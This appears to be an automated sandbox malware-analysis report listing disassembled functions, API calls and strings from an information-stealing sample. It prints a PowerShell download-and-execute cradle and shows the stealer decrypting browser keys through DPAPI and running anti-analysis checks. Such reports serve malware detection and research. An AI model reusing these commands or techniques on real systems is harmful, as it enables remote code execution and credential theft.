                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                            • String ID:
                                            • API String ID: 2311089104-0
                                            • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                            • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                            • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                            • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                            APIs
                                            • __getptd.LIBCMT ref: 023FCC51
                                              • Part of subcall function 023FC206: __getptd_noexit.LIBCMT ref: 023FC209
                                              • Part of subcall function 023FC206: __amsg_exit.LIBCMT ref: 023FC216
                                            • __amsg_exit.LIBCMT ref: 023FCC71
                                            • __lock.LIBCMT ref: 023FCC81
                                            • InterlockedDecrement.KERNEL32(?), ref: 023FCC9E
                                            • free.MSVCRT ref: 023FCCB1
                                            • InterlockedIncrement.KERNEL32(0042B980), ref: 023FCCC9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                            • String ID:
                                            • API String ID: 634100517-0
                                            • Opcode ID: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                                            • Instruction ID: 24d8f5461660cf9286d919d6c268f5a09d1814282f5b7b32f3cef2c17d004e1a
                                            • Opcode Fuzzy Hash: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                                            • Instruction Fuzzy Hash: 64012272A80A28EBCBB0EB69B44475CB361FF04714F000517EE14A72B0CB346882DFD9
                                            APIs
                                            • __getptd.LIBCMT ref: 0041C9EA
                                              • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                              • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                            • __amsg_exit.LIBCMT ref: 0041CA0A
                                            • __lock.LIBCMT ref: 0041CA1A
                                            • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                            • free.MSVCRT ref: 0041CA4A
                                            • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                            • String ID:
                                            • API String ID: 634100517-0
                                            • Opcode ID: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                                            • Instruction ID: 63787520114d18ae3399c837c16bfac6c494309a1b2e91ce42418771fe72ad0a
                                            • Opcode Fuzzy Hash: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                                            • Instruction Fuzzy Hash: DD01C431A817299BC722EB669C857DE77A0BF04794F11811BE814A7390C73C69D2CBDD
                                            APIs
                                            • strlen.MSVCRT ref: 023F7186
                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,023F7401,00000000,00420BA8,00000000,00000000), ref: 023F71B4
                                              • Part of subcall function 023F6E37: strlen.MSVCRT ref: 023F6E48
                                              • Part of subcall function 023F6E37: strlen.MSVCRT ref: 023F6E6C
                                            • VirtualQueryEx.KERNEL32(023F7574,00000000,?,0000001C), ref: 023F71F9
                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,023F7401), ref: 023F731A
                                              • Part of subcall function 023F7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 023F705F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                            • String ID: @
                                            • API String ID: 2950663791-2766056989
                                            • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                            • Instruction ID: f26ee33532ec4c2d7ca6f311f01d20c5c26b9d1f930851cf56282ab335de9db3
                                            • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                            • Instruction Fuzzy Hash: 7B51F5B1E00109EBDB44CF98E981AEFB7B6BF88304F148519FA15A7240D734EA11CBA5
                                            APIs
                                            • strlen.MSVCRT ref: 00416F1F
                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                              • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                              • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                            • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                              • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                            • String ID: @
                                            • API String ID: 2950663791-2766056989
                                            • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                            • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                            • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                            • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                            APIs
                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID: *n@$*n@
                                            • API String ID: 1029625771-193229609
                                            • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                            • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                            • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                            • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                            APIs
                                            • lstrcat.KERNEL32(?,0064A30C), ref: 023F4A42
                                              • Part of subcall function 023F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 023F9072
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F4A68
                                            • lstrcat.KERNEL32(?,?), ref: 023F4A87
                                            • lstrcat.KERNEL32(?,?), ref: 023F4A9B
                                            • lstrcat.KERNEL32(?,0064A284), ref: 023F4AAE
                                            • lstrcat.KERNEL32(?,?), ref: 023F4AC2
                                            • lstrcat.KERNEL32(?,0064A2C8), ref: 023F4AD6
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023F8FF7: GetFileAttributesA.KERNEL32(00000000,?,023E1DBB,?,?,00425654,?,?,00420E1F), ref: 023F9006
                                              • Part of subcall function 023F47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 023F47E7
                                              • Part of subcall function 023F47D7: RtlAllocateHeap.NTDLL(00000000), ref: 023F47EE
                                              • Part of subcall function 023F47D7: wsprintfA.USER32 ref: 023F480D
                                              • Part of subcall function 023F47D7: FindFirstFileA.KERNEL32(?,?), ref: 023F4824
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                            • String ID:
                                            • API String ID: 2540262943-0
                                            • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                            • Instruction ID: dbf2eafc806814f2959be2260baa6a6282e69508660110a3ae42339ebafe6c01
                                            • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                            • Instruction Fuzzy Hash: F13195BA9402186BCB64FBF0DC84EE9737AAB48700F4045C9B34596080DE749B89CF95
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                            Strings
                                            • <, xrefs: 00412D39
                                            • ')", xrefs: 00412CB3
                                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            • API String ID: 3031569214-898575020
                                            • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                            • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                            • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                            • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                            APIs
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 023E14A5
                                            • __aulldiv.LIBCMT ref: 023E14BF
                                            • __aulldiv.LIBCMT ref: 023E14CD
                                            • ExitProcess.KERNEL32 ref: 023E14FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                            • String ID: @
                                            • API String ID: 3404098578-2766056989
                                            • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                            • Instruction ID: f8356d2f7b94be1e6d8294d135c95f55c83ff727e7ee81cf20f6eff411784741
                                            • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                            • Instruction Fuzzy Hash: EC011DB0A51308FAEF20DBD0DC89B9DBBB9AF04705F208448E74A7B6C0D7B499458B55
                                            APIs
                                            • memcmp.MSVCRT(?,00421264,00000003), ref: 023EA094
                                              • Part of subcall function 023FAA07: lstrcpy.KERNEL32(?,00000000), ref: 023FAA4D
                                              • Part of subcall function 023F0CC7: memset.MSVCRT ref: 023F0E83
                                              • Part of subcall function 023F0CC7: lstrcat.KERNEL32(?,00000000), ref: 023F0E9C
                                              • Part of subcall function 023F0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 023F0EAE
                                              • Part of subcall function 023F0CC7: lstrcat.KERNEL32(?,00000000), ref: 023F0EC4
                                              • Part of subcall function 023F0CC7: lstrcat.KERNEL32(?,00420D80), ref: 023F0ED6
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                            • memcmp.MSVCRT(?,00421114,00000003), ref: 023EA116
                                            • memset.MSVCRT ref: 023EA14F
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 023EA1A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                            • String ID: @
                                            • API String ID: 1977917189-2766056989
                                            • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                            • Instruction ID: 44e0628f85be59c1ea3f4148c466e54de53bcb00eff4fca86413721d7de07929
                                            • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                            • Instruction Fuzzy Hash: DD613B31600258EBCF24EFA4DD95FED7776AF44704F408118EA0AAB591DB746A09CF51
                                            APIs
                                            • strtok_s.MSVCRT ref: 00410DB8
                                            • strtok_s.MSVCRT ref: 00410EFD
                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0079D410,?,0042110C,?,00000000), ref: 0041A82B
                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s$lstrcpylstrlen
                                            • String ID:
                                            • API String ID: 348468850-0
                                            • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                            • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                            • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                            • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                              • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                              • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                              • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                              • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                              • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                              • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                            • String ID: $"encrypted_key":"$DPAPI
                                            • API String ID: 3731072634-738592651
                                            • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                            • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                            • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                            • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CodeInfoPageValidmemset
                                            • String ID:
                                            • API String ID: 703783727-0
                                            • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                            • Instruction ID: b2f75d74dcd920a18489c51f3f9c99a6838e7ff761513f390b4ba81b22f52721
                                            • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                            • Instruction Fuzzy Hash: 07312631A843999EDBA5CF34E894279FFA49B06315B0999BBDA81CF192D328C405C761
                                            APIs
                                            • GetSystemTime.KERNEL32(?), ref: 023F6BD3
                                            • sscanf.NTDLL ref: 023F6C00
                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 023F6C19
                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 023F6C27
                                            • ExitProcess.KERNEL32 ref: 023F6C41
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$System$File$ExitProcesssscanf
                                            • String ID:
                                            • API String ID: 2533653975-0
                                            • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                            • Instruction ID: f83de1b2ca90fb217f9e6221c4ff08db0a159299eed38be2fe26ce13bc56431f
                                            • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                            • Instruction Fuzzy Hash: 9F21CBB5D14209AFCF48EFE4E9459EEB7BAFF48300F04852EE516A3250EB345605CB65
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 023F809E
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F80A5
                                            • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 023F80C5
                                            • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 023F80E6
                                            • RegCloseKey.ADVAPI32(?), ref: 023F80F9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                            • Instruction ID: ae740cc7fedbb4e5b12f104fbdfdf60e27412d7535cbbe7ce4d3dc4dd6cc2a4e
                                            • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                            • Instruction Fuzzy Hash: A2113DB5A84209BBD714CFD4ED4AFABB7BDEB05710F104219F615A7680C7B958018BA1
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                            • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                            • RegOpenKeyExA.ADVAPI32(80000002,00799DE8,00000000,00020119,?), ref: 00417E5E
                                            • RegQueryValueExA.ADVAPI32(?,007CB6D8,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                            • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3466090806-0
                                            • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                            • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                            • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                            • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 023F799B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F79A2
                                            • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,023F7920), ref: 023F79C2
                                            • RegQueryValueExA.ADVAPI32(023F7920,00420AAC,00000000,00000000,?,000000FF), ref: 023F79E1
                                            • RegCloseKey.ADVAPI32(023F7920), ref: 023F79EB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                            • Instruction ID: 4b4d727a02f2f98519c754c7282d4d102258ea03c388ba34f38285b1938617b0
                                            • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
